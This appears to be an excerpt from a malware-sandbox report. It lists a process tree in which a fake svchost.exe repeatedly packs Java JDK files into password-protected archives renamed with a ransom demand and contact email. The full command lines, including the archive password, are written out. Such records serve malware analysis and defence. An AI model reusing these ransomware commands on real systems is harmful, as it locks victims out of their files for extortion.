  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\THIRDPARTYLICENSEREADME.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\THIRDPARTYLICENSEREADME.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2876
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-netbeans-core.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-netbeans-core.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1188
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-netbeans-modules-options-api.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-netbeans-modules-options-api.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1684
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-netbeans-modules-queries.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-netbeans-modules-queries.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2240
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-execution.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-execution.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:772
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-explorer.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-explorer.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2676
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-filesystems.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-filesystems.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1620
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-loaders.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-loaders.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:448
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-modules.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-modules.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:3000
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-nodes.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-nodes.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:712
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-text.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-text.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2112
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-util.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-util.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:952
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-annotations-common.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-annotations-common.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2556
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-progress.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-progress.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1732
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-search.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-search.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:3040
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-visual.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-visual.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1548
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-execution.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-execution.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2144
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-io-ui.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-io-ui.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:112
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-multitabs.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-multitabs.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1480
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-multiview.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-multiview.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2412
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-output2.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-output2.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1780
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-ui.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-ui.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2984
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-windows.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-windows.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2944
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1996
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-lib-uihandler.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-lib-uihandler.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2836
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-applemenu.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-applemenu.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2276
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-autoupdate-cli.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-autoupdate-cli.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2872
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-autoupdate-services.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-autoupdate-services.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2972
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-autoupdate-ui.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-autoupdate-ui.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2500
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-core-kit.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-core-kit.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2352
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-editor-mimelookup-impl.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-editor-mimelookup-impl.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2628
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-editor-mimelookup.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-editor-mimelookup.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2436
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-favorites.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-favorites.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:560
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-javahelp.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-javahelp.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1240
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-keyring-fallback.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-keyring-fallback.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2024
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-keyring-impl.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-keyring-impl.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1824
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-keyring.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-keyring.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2716
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-masterfs-nio2.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-masterfs-nio2.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1928
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-masterfs.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-masterfs.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2120
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-options-api.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-options-api.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:856
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-options-keymap.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-options-keymap.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2504
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-print.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-print.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2116
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-progress-ui.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-progress-ui.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1352
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-queries.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-queries.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:812
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-sampler.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-sampler.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2952
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-sendopts.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-sendopts.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:964
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-settings.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-settings.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2216
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-spi-actions.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-spi-actions.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1944
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-uihandler.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-uihandler.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2920
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-spi-quicksearch.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-spi-quicksearch.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1304
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-swing-outline.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-swing-outline.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2560
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-swing-plaf.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-swing-plaf.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1204
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-swing-tabcontrol.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-swing-tabcontrol.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1932
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-actions.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-actions.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2236
